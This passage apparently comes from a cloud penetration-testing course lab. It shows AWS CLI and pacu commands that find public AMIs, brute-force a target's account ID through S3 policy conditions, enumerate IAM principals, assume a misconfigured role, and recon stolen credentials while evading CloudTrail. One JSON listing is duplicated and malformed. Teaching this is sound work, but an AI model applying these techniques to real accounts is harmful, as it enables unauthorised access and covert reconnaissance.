--filters "Name=filter-name,Values=filter-value1,filter-value2,..."
Listing 18 - The Filter Expression Format
Name refers to the attribute of the object we want to filter and Values refers to the content of that attribute. Therefore, to filter for AMIs that include the word "offseclab" in the description attribute, we'll set:
-\-filters "Name=description,Values=\*Offseclab\*"
Listing 19 - The Filter Expression Format for offseclab Word
We'll note that the *Offseclab* value is using the wildcard *. This means that it will match any number of characters (including none characters) at the beginning and the end surrounding the word "Offseclab".
kali@kali:~$ aws --profile attacker ec2 describe-images --executable-users all --filters "Name=description,Values=*Offseclab*"
{
"Images": []
}
Listing 20 - Listing All Public AMIs After Filtering the List Using the Keyword "description"
We got a response with an empty list, meaning that there were no images that matched our filter.
Another attribute that the user can set when creating the image is the name, so let's try filtering by that one.
kali@kali:~$ aws --profile attacker ec2 describe-images --executable-users all --filters "Name=name,Values=*Offseclab*"
{
"Images": [
{
"Architecture": "x86_64",
"CreationDate": "2023-08-05T19:43:29.000Z",
"ImageId": "ami-0854d94958c0a17e6",
"ImageLocation": "123456789012/Offseclab Base AMI",
"ImageType": "machine",
"Public": true,
"OwnerId": "123456789012",
"PlatformDetails": "Linux/UNIX",
"UsageOperation": "RunInstances",
"State": "available",
"BlockDeviceMappings": [
{
"DeviceName": "/dev/xvda",
"Ebs": {
"DeleteOnTermination": true,
{
"DeviceName": "/dev/xvda",
"Ebs": {
"DeleteOnTermination": true,
"DeleteOnTermination": true,
"SnapshotId": "snap-098dc18c797e4f255",
"VolumeSize": 8,
"VolumeType": "gp2",
"Encrypted": false
}
}
],
"EnaSupport": true,
"Hypervisor": "xen",
"Name": "Offseclab Base AMI",
"RootDeviceName": "/dev/xvda",
"RootDeviceType": "ebs",
"SriovNetSupport": "simple",
"Tags": [
{
"Key": "Name",
"Value": "Offseclab Base AMI"
}
],
"VirtualizationType": "hvm",
"DeprecationTime": "2023-08-05T21:43:00.000Z"
}
]
}
Listing 21 - Listing All Public AMIs After Filtering the List Using the Keyword "name"
This time we got a match and found one AMI. We also got the account ID that most likely belongs to the target organization. With the account ID, we can search for more AMIs or other resources; we'll leave that as an exercise for the end of this section.
Similarly, we can seek publicly-shared EBS snapshots using the ec2 describe-snapshots command.
kali@kali:~$ aws --profile attacker ec2 describe-snapshots --filters "Name=description,Values=*offseclab*"
{
"Snapshots": []
}
Listing 22 - Listing Public Snapshots After Filtering the List Using the Keyword "description"
We couldn't find any other resource, but we can get an idea of how to use the CSP's API features to search for publicly-shared resources.
There isn't a golden rule for this, though. The search will depend on the type of resource, the service API, the public CSP, etc. The best way to approach this is to investigate publicly-exposable resources in specific CSPs (e.g. AWS) and consult the documentation for the services we want to try.
Finding these type of resources widens the attack surface and opens new attack vectors to try. For instance, with the AMI found in offseclab.io, we can try launching an EC2 instance with that image and searching for more sensitive data. Even if we don't find sensitive info that can give us direct access to the cloud infrastructure, we still can learn more about our target.
Labs
- Why might large organizations share cloud resources publicly or between accounts?
A) To reduce costs associated with cloud storage
B) To facilitate internal operations and resource sharing
C) To ensure all resources contain sensitive data
D) To avoid using CSP's API for resource access
- What is the purpose of the --owners amazon argument in the AWS CLI command?
A) To list all images owned by the current account
B) To list all images that are publicly available
C) To list all images owned by AWS
D) To list all images that contain the keyword "amazon"
- Use the account ID to search for other publicly shared resources. You will find a 1 GB-sized snapshot (VoumeSize: 1). Copy the description of the newly found resource and paste it into the answer box. (This resource is not really publicly shared, but we should be able to list it with the provided credentials for the lab.)
24.3.3. Obtaining Account IDs from S3 Buckets
In the previous section, we discovered the AWS account ID of the target by finding publicly-shared resources through the AWS API. In this case, we'll assume that there are no publicly shared resources, so we can't get the account ID that way.
In this section, we'll learn a technique for how we can abuse the API features and capabilities to obtain the target's account ID from a publicly-shared S3 bucket or object.
To perform this technique, the attacker needs an AWS account to interact with the AWS API. We'll use the attacker profile in the AWS CLI to simulate this scenario. Additionally, the target account must have a publicly readable S3 bucket, which this lab's target account does.
Warning
In this lab the attacker profile we configured is a user that belongs to the target account. However in a real scenario, this user would belong to an external account.
We'll begin by creating an IAM user that, by default, won't have any permissions to execute actions. Then we'll add a policy to grant read access to the bucket with the Condition that the permission will only apply if the account ID that owns the bucket starts with the digit "x". If we can't read the bucket, we'll keep trying with other numbers until we are able to read the bucket, showing we've identified the first digit of the account ID where the bucket resides. We can iterate through the other digits until we retrieve all the account IDs.
First, we'll choose a publicly-readable bucket or object inside the target account. Because the bucket/object is publicly-readable, we should be able to list the content of it with any IAM user of any AWS account. In the lab, we'll choose one of the publicly-readable buckets.
Then, we'll create a new IAM user in our attacker account. By default, IAM users don't have any permissions to execute any actions, so the new user won't be able to list the content of the public resource even when it's public.
Next, we'll create a policy that will grant permissions to list buckets and read objects. However, we'll add the Condition that the read permission will only apply if the account ID that owns the bucket starts with the digit "x".
After we apply the policy to the new IAM user, we'll test if we can list the bucket with the new user's credentials. We'll test the value x from 0 to 9 until we can list the bucket, meaning that we found the first digit of the account.
Warning
This technique is tailored for AWS. However, it shows how APIs can be exploited to retrieve information beyond their intended purpose, a tactic that can be relevant in various platforms and contexts.
Let's check how this works in our lab. We can use the offseclab-assets-public-... bucket, which is publicly-readable. If it wasn't readable, we could also use a publicly-readable object on the bucket, such as any of the images of the website.
To begin, let's retrieve the bucket name again.
Warning
The bucket name has a random string that changes every time we restart the lab. We need to check the new name every time we restart the lab.
We can browse the website www.offseclab.io and get the bucket name from the URL of any of the images in the website as we did previously. This time, however, we will use curl to perform this task.
First, we'll get the source code in HTML of the main site using curl -s www.offseclab.io. The -s flag will omit the loading statistic lines that curl outputs by default.
In our next step, we'll pipe the output to grep to filter out a particular string or pattern, aiming to extract the bucket's name. This bucket's name begins with the prefix "offseclab-assets-public-" and is followed by a random sequence of eight alphanumeric characters. This is represented as the regular expression offseclab-assets-public-\w{8}. The -P flag instructs grep to interpret the pattern using perl-regexp syntax. Since the default behavior of grep is to display the entire line where the pattern is found, we'll use -o to display just the matched portion.
kali@kali:~$ curl -s www.offseclab.io | grep -o -P 'offseclab-assets-public-\w{8}'
offseclab-assets-public-kaykoour
offseclab-assets-public-kaykoour
offseclab-assets-public-kaykoour
offseclab-assets-public-kaykoour
Listing 23 - Getting the Name of the Public Bucket with curl
The output shows four matches, one for every image in the homepage source code. We can copy the bucket name from the output.
Last time, we validated that the bucket was publicly-accessible by listing the content in the web browser. We'll use the AWS CLI tool this time. To list the content of the bucket, we can use the s3 ls command.
kali@kali:~$ aws --profile attacker s3 ls offseclab-assets-public-kaykoour
PRE sites/
Listing 24 - Listing the Public Bucket as the attacker
Ideally, we are running this command from our own AWS account, so it's safe to assume that the bucket probably has an ACL or policy that grants read access to all accounts.
Now, let's create a new IAM user with the iam create-user --user-name enum command. Let's keep in mind that this user resides in the attacker-controlled AWS account.
Next, we'll also create access keys for the IAM user, so we can interact as this user with the AWS API through the AWS CLI tool. We'll run the iam create-access-key --user-name enum command and take note of the AccessKeyId and SecretAccessKey in the output.
kali@kali:~$ aws --profile attacker iam create-user --user-name enum
{
"User": {
"Path": "/",
"UserName": "enum",
"UserId": "AIDAQOMAIGYU4HTPEJ32K",
"Arn": "arn:aws:iam::123456789012:user/enum",
}
}
kali@kali:~$ aws --profile attacker iam create-access-key --user-name enum
{
"AccessKey": {
"UserName": "enum",
"AccessKeyId": "AKIAQOMAIGYURE7QCUXU",
"Status": "Active",
"SecretAccessKey": "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",
}
}
Listing 25 - Creating the IAM User "enum" and Generating AccessKeyId and SecretAccessKey for that User
To interact as the new IAM user, we'll create a profile in the AWS CLI with the newly-created access keys. We'll run aws configure --profile enum and input the Access Key ID and Secret Access Key.
Once the profile is created, we just need to add the --profile enum argument to every command we want to run as the enum user. Let's try this by running aws sts get-caller-identity --profile enum. This will return the UserId, Account, and ARN (Amazon Resource Name) of the identity interacting with the API.
kali@kali:~$ aws configure --profile enum
AWS Access Key ID [None]: AKIAQOMAIGYURE7QCUXU
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: json
kali@kali:~$ aws sts get-caller-identity --profile enum
{
"UserId": "AIDAQOMAIGYU4HTPEJ32K",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/enum"
}
Listing 26 - Configuring AWS CLI with Profile "enum"
Newly-created users with no policies attached are almost fully restricted from accessing any resource, even listing public buckets in other AWS accounts. However, we can provide access by creating a policy that allows a very specific action, such as listing a public bucket. If we add a condition that checks if the account number owning the S3 bucket starts with a specific number, we can enumerate and extract the account number.
Before proceeding, we need to address a key difference between our lab environment and a real attack. In a real attack, the enum user resides in the attacker's AWS Account. In our lab environment, both the enum user and the target bucket are on the same AWS account. This forces us to slightly change the exploit. Instead of listing the public bucket, we'll list the private bucket. The reason for this is that even though an IAM user doesn't have a policy attached granting permission to list buckets, the user can still read the public buckets in the same account the user resides in. This is expected behavior with the AWS API.
The rest of the exploit works the same. We only need to list the private bucket instead of the public bucket. This will simulate an attacker enumerating from a different AWS account.
Because the new enum user has no policies yet, it will Deny ALL actions by default. This means that if we try to list the content of the bucket again with this user, we'll receive an AccessDenied error.
kali@kali:~$ aws --profile enum s3 ls offseclab-assets-private-kaykoour
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
Listing 27 - Listing the Private Bucket with the enum User
Now, let's write a policy that will allow for listing the content of the bucket and reading objects inside it.
We'll name the policy document policy-s3-read.json.
# policy-s3-read.json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowResourceAccount",
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject"
],
"Resource": "*",
"Condition": {
"StringLike": {"s3:ResourceAccount": ["0*"]}
}
}
]
}
Listing 28 - Policy to Allow Listing Buckets and Reading Objects
We can use our favorite text editor to write the policy. In the example below, we use nano. After copying and pasting the content of the policy, we'll display it again and analyze it.
kali@kali:~$ nano policy-s3-read.json
kali@kali:~$ cat -n policy-s3-read.json
1 {
2 "Version": "2012-10-17",
3 "Statement": [
4 {
5 "Sid": "AllowResourceAccount",
6 "Effect": "Allow",
7 "Action": [
8 "s3:ListBucket",
9 "s3:GetObject"
10 ],
11 "Resource": "*",
12 "Condition": {
13 "StringLike": {"s3:ResourceAccount": ["0*"]}
14 }
15 }
16 ]
17 }
Listing 29 - Creating the policy document file
The policy allows (line 6) to list buckets (line 8) and read any object in the buckets (line 9). There is a * wildcard in the Resource attribute (line 11) meaning that the actions are allowed for any bucket and object in any account. On lines 12-14, we add a condition to make this policy valid only if the account ID hosting the resource (ResourceAccount) starts with "0" following "any other digits" (using the wildcard for this).
We'll associate this policy with the enum IAM user with an inline policy using the iam put-user-policy command.
Using the --user-name enum argument, we can specify the name of the IAM user.
The --policy-name argument lets us set a name for the policy. This is just for reference. We'll name the policy s3-read.
The --policy-document argument expects a string with the policy in JSON format. The prefix file:// instructs the tool to read the policy from policy-s3-read.json.
The command will not return output if the policy was successfully applied. However, we can verify it using the iam list-user-policies --user-name enum command.
kali@kali:~$ aws --profile attacker iam put-user-policy \
--user-name enum \
--policy-name s3-read \
--policy-document file://policy-s3-read.json
kali@kali:~$ aws --profile attacker iam list-user-policies --user-name enum
{
"PolicyNames": [
"s3-read"
]
}
Listing 30 - Attaching the s3-read Inline Policy to the enum IAM User
According to the policy we set, the user will be able to read the content of the bucket only if the account ID where the bucket resides starts with "0". In our lab, our account is "123456789012". It doesn't start with "0", so we'll get an AccessDenied error when trying to list the bucket.
If we change the policy in the file and apply it again to the enum user, we'll be able to list the bucket. This time it works because our account starts with the digit "1".
Warning
Policies take a few seconds to be active after they are applied, so we might need to wait 10-15 seconds each time we test.
We can run aws --profile attacker sts get-caller-identity to retrieve the account ID of our lab. This will help us validate our technique.
kali@kali:~$ aws --profile enum s3 ls offseclab-assets-private-kaykoour
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
kali@kali:~$ nano policy-s3-read.json
kali@kali:~$ cat -n policy-s3-read.json
1 {
2 "Version": "2012-10-17",
3 "Statement": [
4 {
5 "Sid": "AllowResourceAccount",
6 "Effect": "Allow",
7 "Action": [
8 "s3:ListBucket",
9 "s3:GetObject"
10 ],
11 "Resource": "*",
12 "Condition": {
13 "StringLike": {"s3:ResourceAccount": ["1*"]}
14 }
15 }
16 ]
17 }
kali@kali:~$ aws --profile attacker iam put-user-policy \
--user-name enum \
--policy-name s3-read \
--policy-document file://policy-s3-read.json
kali@kali:~$ aws --profile enum s3 ls offseclab-assets-private-kaykoour
PRE sites/
Listing 31 - Changing the Condition in the Policy and Testing Again
Once we know that the policy starts with a digit, we can move to the next one by modifying the condition of the policy like so:
- __"StringLike": {"s3:ResourceAccount": ["10*"]}__
- __"StringLike": {"s3:ResourceAccount": ["11*"]}__
...
- __"StringLike": {"s3:ResourceAccount": ["18*"]}__
- __"StringLike": {"s3:ResourceAccount": ["19*"]}__
Listing 32 - Modifying the Policy Condition Statement to Brute Force the AccountID
We can automate this process programmatically and build an application to obtain the account ID from a publicly-accessible bucket or object.
Tools such as s3-account-search also implement this technique, although this one uses roles instead of users to link the policy to the condition.
As we can observe, there are several ways to implement this. The key concept is leveraging the "Condition" feature of the IAM policies to control the cross-account access. We used S3 because it's more common to find publicly-readable S3 objects than other resources, but theoretically, we can use this technique with other services as well.
Labs
- What is the main objective of the technique described in the text?
A) To create IAM users with full access to all AWS resources.
B) To obtain the target's AWS account ID from a publicly-shared S3 bucket or object.
C) To restrict access to S3 buckets using IAM policies.
D) To list all S3 buckets in an AWS account.
- How is the publicly-readable bucket name initially obtained?
A) By guessing the bucket name based on common naming conventions.
B) By accessing the AWS management console.
C) By retrieving it from the URL of any image on the website using the curl command.
D) By querying the AWS CLI tool directly.
3 What AWS CLI command is used to list the contents of a bucket?
A) aws s3 cp
B) aws s3 mb
C) aws s3 ls
D) aws s3 rm
24.3.4. Enumerating IAM Users in Other Accounts
In the previous section, we examined a case where the API was misused to obtain the account ID of a target. In this section, we will continue to build upon the previous lab. We'll learn about another example of API abuse that enumerates internal IAM identities when we know the AWS account ID of the target.
Previously, we leveraged resources that had either publicly accessible permissions or, at the very least, permissions that granted read access to the attacker's account. We need to be aware of the latter because an important concept in this case is that sometimes we want a cloud resource to be publicly available on the internet, but at other times, we may want a resource to be accessible only to specific accounts. In AWS, this is referred to as cross-account access.
To configure cross-account access through IAM policies, we can specify both the account that will be granted access and the IAM identity (User, Group, or Role) within that account. If the identity does not exist, it will throw an error when trying to apply that policy.
To grant access to an identity in a different account, we need to create a policy and configure the Principal attribute, which will contain the IAM identity in a specific account. AWS will validate the existence of the identity and will return an error if it doesn't exist.
Typically, we use the AWS Resource Name (ARN) to specify an IAM identity, as shown below:
"Principal": {
"AWS": ["arn:aws:iam::AccountID:user/user-name"]
}
Listing 33 - Example of a Principal Definition Inside a policy
The identity's ARN follows a standard format. We can craft it by modifying the Account's ID and the IAM user's username. So, for example, if the attacker wants to test if the cloudadmin user exists in the account 123456789012, then the Principal definition of the policy should be:
"Principal": {
"AWS": ["arn:aws:iam::123456789012:user/cloudadmin"]
}
Listing 34 - Example of a Principal Definition Specifying the ARN of an IAM user
The attacker can then apply/attach this policy to a resource and if it fails, it means that the user doesn't exist.
Let's observe how this works in our lab.
Warning
In the previous section, we already retrieved the account ID of the target's AWS account. The account will change after restarting the lab. We can either repeat the technique or we can get the account in the info box after starting the lab.
First, let's create an S3 bucket inside our attacker's account. The command aws s3 mb s3://offseclab-dummy-bucket-$RANDOM-$RANDOM-$RANDOM will create a bucket with the name offseclab-dummy-bucket, followed by random integer values to ensure that the bucket name is unique.
kali@kali:~$ aws --profile attacker s3 mb s3://offseclab-dummy-bucket-$RANDOM-$RANDOM-$RANDOM
make_bucket: offseclab-dummy-bucket-28967-25641-13328
Listing 35 - Creating a S3 Bucket in the attacker's Account
By default, the newly-created bucket is private. Now we are going to define a policy document in which we'll grant read permission only to a specific IAM user in the target account. We can use any text editor of our preference to write the policy. We'll use the ARN we crafted earlier to test if the cloudadmin user exists in the account 123456789012.
kali@kali:~$ nano grant-s3-bucket-read.json
kali@kali:~$ cat grant-s3-bucket-read.json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowUserToListBucket",
"Effect": "Allow",
"Resource": "arn:aws:s3:::offseclab-dummy-bucket-28967-25641-13328",
"Principal": {
"AWS": ["arn:aws:iam::123456789012:user/cloudadmin"]
},
"Action": "s3:ListBucket"
}
]
}
Listing 36 - Policy Granting Permission to List the Bucket to a Single IAM User
Now that we have our policy document, we are ready to attach it to the bucket using the aws s3api put-bucket-policy command.
The --bucket flag specifies the name of the S3 bucket to which the policy should be applied. In this case, the name of the bucket is offseclab-dummy-bucket-28967-25641-13328.
The --policy file://grant-s3-bucket-read2.json argument specifies the policy that will be attached. Because our policy is defined in grant-s3-bucket-read2.json, we must use the prefix file:// to instruct AWS CLI to read the policy from that file.
If no error returns after running the command, our policy was applied successfully. This also means that the cloudadmin user exists in the target account.
kali@kali:~$ aws --profile attacker s3api put-bucket-policy --bucket offseclab-dummy-bucket-28967-25641-13328 --policy file://grant-s3-bucket-read.json
kali@kali:~$
Listing 37 - Attaching the Resource Based Policy to the Test Bucket
Next, let's copy the policy to create a new one - but this time, we'll grant privileges to a nonexistent principal.
kali@kali:~$ cp grant-s3-bucket-read.json grant-s3-bucket-read-userDoNotExist.json
kali@kali:~$ nano grant-s3-bucket-read-userDoNotExist.json
kali@kali:~$ cat grant-s3-bucket-read-userDoNotExist.json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowUserToListBucket",
"Effect": "Allow",
"Resource": "arn:aws:s3:::offseclab-dummy-bucket-28967-25641-13328",
"Principal": {
"AWS": ["arn:aws:iam::123456789012:user/nonexistant"]
},
"Action": "s3:ListBucket"
}
]
}
kali@kali:~$ aws --profile attacker s3api put-bucket-policy --bucket offseclab-dummy-bucket-28967-25641-13328 --policy file://grant-s3-bucket-read-userDoNotExist.json
An error occurred (MalformedPolicy) when calling the PutBucketPolicy operation: Invalid principal in policy
Listing 38 - Editing the Policy Specifying a Non-existing User and Testing Again
When we tried to attach a resource-based policy to a bucket granting permissions to a Principal that does not exist, it returns an error message stating 'Invalid principal in policy'. The error message may mislead one to think that there is something wrong with the definition of the principal in the policy, but this actually occurs because the API couldn't internally validate the existence of the principal.
We can automate this process to obtain a valid enumeration technique that will indicate whether a Principal exists. In our example, we checked the existence of an IAM user, but we can also define other principals such as groups and roles.
The concept of abusing the API to enumerate users in another account can be applied using roles and the AssumeRole action. When we create a role, we need to set a trust policy that specifies the principals that will have permission to assume that role. Similarly, as it happened with the resource-based policy of the S3 bucket, an error will occur if the Principal does not exist.
Let's suppose we have a large list of potential role names we want to test by brute forcing this enumeration technique. For this lab, we'll limit our list to a few options. This approach not only saves time, but also considers that our demonstration is conducted against an authentic service provider. Let's create a list of 10 potential role names we want to try. Typically, we'd attempt to find roles related to the target activities. We can even use AI tools to help build a more extensive list.
kali@kali:~$ echo -n "lab_admin
security_auditor
content_creator
student_access
lab_builder
instructor
network_config
monitoring_logging
backup_restore
content_editor" > /tmp/role-names.txt
Listing 39 - Creating a List of Roles to Search in the Account
In this case, we'll use a popular tool named pacu that can automate this technique of user and role enumeration. This tool is available in Kali's official repositories and can be installed by running the following commands:
kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install pacu
Listing 40 - Installing pacu in Kali Linux Using the Package Manager
After installation completes, we'll be ready to use the tool. We can run pacu -h to display the usage help. This will also verify that the tool is successfully installed.
kali@kali:~$ pacu -h
usage: pacu [-h] [--session] [--activate-session] [--new-session] [--set-keys] [--module-name] [--data] [--module-args]
[--list-modules] [--pacu-help] [--module-info] [--exec] [--set-regions [...]] [--whoami]
options:
-h, --help show this help message and exit
--session <session name>
--activate-session activate session, use session arg to set session name
--new-session <session name>
--set-keys alias, access id, secrect key, token
--module-name <module name>
--data <service name/all>
--module-args <--module-args='--regions us-east-1,us-east-1'>
--list-modules List arguments
--pacu-help List the Pacu help window
--module-info Get information on a specific module, use --module-name
--exec exec module
--set-regions [ ...]
<region1 region2 ...> or <all> for all
--whoami Display information on current IAM user
Listing 41 - Getting the pacu Usage Help
Next, we'll run pacu without any other argument to start it in interactive mode. Pacu separates the assessment in sessions. The first time we run pacu, it will prompt for a name to create a session. Let's create a session and name it offseclab.
Once the session is created, it will display a list of available commands and, eventually, we'll get a new command prompt showing that we are in interactive mode within the offseclab session.
kali@kali:~$ pacu
....
Database created at /root/.local/share/pacu/sqlite.db
What would you like to name this new session? offseclab
Session offseclab created.
...
Pacu (offseclab:No Keys Set) >
Listing 42 - Starting pacu in Interactive Mode
First, we'll notice the message No Keys Set in the prompt. We can quickly set keys from the AWS CLI credentials file with the import-keys command. We can specify the profile configured in AWS CLI. Let's import the attacker profile. We can also check that the command prompt changed, showing that now we have available keys.
Pacu (offseclab:No Keys Set) > import_keys attacker
Imported keys as "imported-attacker"
Pacu (offseclab:imported-attacker) >
Listing 43 - Importing the attacker Profile Credentials in pacu
Pacu implements modules to conduct different types of assessments against AWS accounts. We can list all the available modules with the ls command.
Most of the modules require credentials in the target account. We'll browse through the list of modules and search for the Recon_UNAUTH category. We are interested in the one that seems related to enumerating roles.
Pacu (offseclab:imported-attacker) > ls
...
[Category: RECON_UNAUTH]
iam__enum_roles
iam__enum_users
...
Listing 44 - Listing Modules in pacu
To display information about the module, we need to add the help command following the name of the module. Let's learn more about the iam_enum_roles_ module.
Pacu (offseclab:imported-attacker) > help iam__enum_roles
iam__enum_roles written by Spencer Gietzen of Rhino Security Labs.
usage: pacu [--word-list WORD_LIST] [--role-name ROLE_NAME] --account-id
ACCOUNT_ID
This module takes in a valid AWS account ID and tries to enumerate existing
IAM roles within that account. It does so by trying to update the
AssumeRole policy document of the role that you pass into --role-name if
passed or newlycreated role. For your safety, it updates the policy with an
explicit deny against the AWS account/IAM role, so that no security holes
are opened in your account during enumeration. NOTE: It is recommended to
use personal AWS access keys for this script, as it will spam CloudTrail
with "iam:UpdateAssumeRolePolicy" logs and a few "sts:AssumeRole" logs. The
target account will not see anything in their logs though, unless you find
a misconfigured role that allows you to assume it. The keys used must have
the iam:UpdateAssumeRolePolicy permission on the role that you pass into
--role-name to be able to identify a valid IAM role and the sts:AssumeRole
permission to try and request credentials for any enumerated roles.
...
Listing 45 - Displaying Information About iam__enum_roles Module in pacu
The output returned more information about the module, including usage instructions and details of the arguments that we can send.
The --account-id is a required flag that specifies the target's AccountID where we'll enumerate the roles.
The --word-list flag let us specifies the wordlist of roles to try. We'll use the list that we already created in /tmp/role-names.txt.
This module requires an existing role in the attacker's account. If we don't specify a role, the tool will create a temporary role (assuming that the credentials in the attacker account have the permissions to run that action). We'll let the tool create a role for us, therefore we won't use the --role-name flag.
We can use a module with the run command, followed by the name of the module and any other argument that we need to pass.
Pacu (offseclab:imported-attacker) > run iam__enum_roles --word-list /tmp/role-names.txt --account-id 123456789012
Running module iam__enum_roles...
...
[iam__enum_roles] Targeting account ID: 123456789012
[iam__enum_roles] Starting role enumeration...
[iam__enum_roles] Found role: arn:aws:iam::123456789012:role/lab_admin
[iam__enum_roles] Found 1 role(s):
[iam__enum_roles] arn:aws:iam::123456789012:role/lab_admin
[iam__enum_roles] Checking to see if any of these roles can be assumed for temporary credentials...
[iam__enum_roles] Role can be assumed, but hit max session time limit, reverting to minimum of 1 hour...
[iam__enum_roles] Successfully assumed role for 1 hour: arn:aws:iam::123456789012:role/lab_admin
[iam__enum_roles] {
"Credentials": {
"AccessKeyId": "ASIAQOMAIGYUWZXRMMO2",
"SecretAccessKey": "2UU80dtizqx3DUa9mn6033AjXKb13GXOMCy+tOUt",
"SessionToken": "FwoGZXIvYXdzEO///////////wEaDCv5...",
"Expiration": "2023-08-18 22:07:49+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROAQOMAIGYUR5KMGWT7V:dCkQ0O1y6n9KSQmGBaKJ",
"Arn": "arn:aws:sts::123456789012:assumed-role/lab_admin/dCkQ0O1y6n9KSQmGBaKJ"
}
}
Cleaning up the PacuIamEnumRoles-XbsIV role.
Listing 46 - Running the enum_roles Module in pacu
Excellent! The tool not only helped enumerate and discover a role, it also checked if the role had enough permissions for us to use it via assumeRole.
We are now in the state of an "Initial Compromise" and the next step will be scoping what we can achieve with our new level of access.
These examples show how an attacker can leverage the API to obtain information beyond their intended purpose. Furthermore, since these interactions with the API occur within the attacker's account, all related events are logged there, leaving no trace in the target's account.
Labs
- Enumerate other roles by creating a new list with the keywords: "saphire", "ruby", and "amethyst" following a dash and one of the custom name roles we created before. For example:
ruby-lab_admin
ruby-security_auditor
ruby-content_creator
...
amethyst-backup_restore
amethyst-content_editor
Write the name of the role we can assume.
- Assume the role you found in the previous exercise and list (describe) all available VPCs using the role privileges. You will find the proof in a tag of one of the VPCs.
24.4. Initial IAM Reconnaissance
This Learning Unit covers the following Learning Objectives:
- Examining Compromised Credentials
- Scoping IAM permissions
After a successful enumeration and gaining an initial compromise, an attacker will often leverage footprinting techniques within the compromised environment. They will identify which accounts or access keys have been affected, and attempt to determine their level of access within the compromised environment. This process will often highlight potential attack vectors that may lead to the fulfillment of the attack's ultimate objectives.
Public cloud platforms typically log events of user activity by default. However, the level of monitoring, detection, and alerting varies based on an organization's configuration. Access attempts to restricted resources or unauthorized actions are more likely to trigger alerts. Skilled attackers keep their activity within the range of the compromised credentials' authorized actions to lower the chances of detection in these early stages.
At this stage, we won't begin enumerating resources. Instead, we'll focus on gathering initial information from the compromised credentials, including understanding the scope of access within the AWS environment. We'll explore various techniques for this, some stealthy and others less so.
24.4.1. Accessing the Lab
For the hands-on experience in this Learning Unit, we'll assume the role of an attacker that achieved an initial compromise against the target, who gained access to credentials allowing them to run actions within the AWS cloud environment.
We'll interact with the AWS infrastructure with AWS CLI, a unified tool used to manage AWS services directly from the command line. Although AWS CLI can run on several operating systems, we'll run it on Kali Linux. Since AWS CLI is included in Kali's official repositories, we'll install it with the package manager by running sudo apt install awscli.
After deploying the lab we'll receive credentials to interact with AWS as three different users.
The target user will simulate the compromised access to the cloud environment. This is the user we'll use most often while learning techniques to get information from this initial access.
The challenge user is an auxiliary user with very limited access that we'll use to test concepts and execute additional tasks, validating our newly learned skills.
The monitor user will simulate an operator with access to Cloudtrail, the AWS logging service.
For the moment let's start the lab deployment and take note of this information. We can organize the data as follows:
- Credentials access as the target user.
- Target ACCESS KEY ID
- Target SECRET ACCESS KEY
- Credentials access as the challenge user.
- Challenge ACCESS KEY ID
- Challenge SECRET ACCESS KEY
- Credentials to access as the monitor user.
- Management Console login URL
- Username
- Password
We'll configure and use these credentials in the upcoming section.
24.4.2. Examining Compromised Credentials
We begin our scenario with the assumption that we have obtained compromised credentials to interact with the target's cloud environment.
First, let's run aws configure to configure AWS CLI with these compromised credentials. We'll also include --profile target to create a profile named target. While this step is optional, it will help us easily identify when we are executing commands as the target user. If we acquire new credentials, we can seamlessly switch between users by specifying the profile instead of reconfiguring AWS CLI each time.
We won't need the exact region in this initial stage so we'll simply choose us-east-1 as the default region.
The default output format is json. We can specify it or leave it blank, either of which will work for our purposes.
kali@kali:~$ aws configure --profile target
AWS Access Key ID []: AKIAVXWRNA7HUYFERLHS...
AWS Secret Access Key []: u1CmqAO9QR...
Default region name []: us-east-1
Default output format []: json
Listing 47 - Configuring AWS CLI with profiles
This configuration command won't return any output. Moving on, the next priority as an attacker would be to determine if the account is valid.
One way to do this is with the aws sts get-caller-identity command, which will provide us with two pieces of information about the IAM identity whose credentials are used to call the operation. These include the account ID, the identity type (IAM user or role) and the name of the identity.
Let's try running this command with our compromised credentials.
Warning
Unless otherwise specified, we'll use the target profile we configured in AWS CLI throughout this section. This means we need to include --profile target in every command we run.
kali@kali:~$ aws --profile target sts get-caller-identity
{
"UserId": "AIDAQOMAIGYUYNMOIF46I",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/support/clouddesk-plove"
}
Listing 48 - Getting details from the compromised credentials by running get-caller-identity.
This output reveals quite a bit of information about our current IAM user (or role). First, the UserID of the account we compromised is "AIDAQOMAIGYUYNMOIF46I". This is the unique identifier of this IAM user. We also learned the AWS account ID number of the account that controls this IAM User. We can use this Account ID to help identify our target or to confirm if the credentials correspond to the target we're focusing on. Finally, we determined the Amazon Resource Name (ARN) associated with the calling entity. The ARN uniquely identifies AWS resources and in this case, the IAM user name is clouddesk-plove. It is associated with the path /support/.
Tip
Paths are optional identifiers used for grouping related identities to align with the company's organization structure.
The get-caller-identity subcommand is a good way to identify the account and identity of the credentials, and this action will never return an AccessDenied error. However, we should be aware that this action is logged in Cloudtrail's event history. As defenders, we should establish alerts for these types of calls as they are typically executed by attackers once they've compromised credentials.
Tip
No permissions are required to perform this operation. If an administrator attaches a policy to an identity that explicitly denies access to the sts:GetCallerIdentity action, we can still perform this operation. Permissions are not required because the same information is returned when access is denied.
Alternatively, we could use the more-stealthy aws iam get-access-key-info command technique to gather this information. This will return the account identifier for the access key ID we specify with the --access-key-id flag. Executing this command from an external account ensures that the event logs within the attacker's account instead of the target's.
We'll run this command using the challenge user to simulate an attack from an external account. We'll specify the Access Key ID of the target's credentials. Be aware that this value will change every time we start the lab.
We'll configure AWS CLI to use the challenge user credentials by creating a profile and then include the --profile challenge to interact with AWS as the challenge user.
kali@kali:~$ kali@kali:~$ aws configure --profile challenge
AWS Access Key ID []: AKIAVXW...
AWS Secret Access Key []: KlnPvlFhvrrxg...
Default region name []: us-east-1
Default output format []: json
kali@kali:~$ aws --profile challenge sts get-access-key-info --access-key-id AKIAQOMAIGYUVEHJ7WXM
{
"Account": "123456789012"
}
Listing 49 - Getting the account ID from access keys with the get-access-key-info command.
Penetration testers can also use the get-access-key-info subcommand to determine whether or not a compromised credential is inside the scope of the assessment.
Another stealthy approach is to abuse error messages that aren't logged by default in the Cloudtrail event history. For example, let's try invoking a nonexistent Lambda function using the compromised credentials.
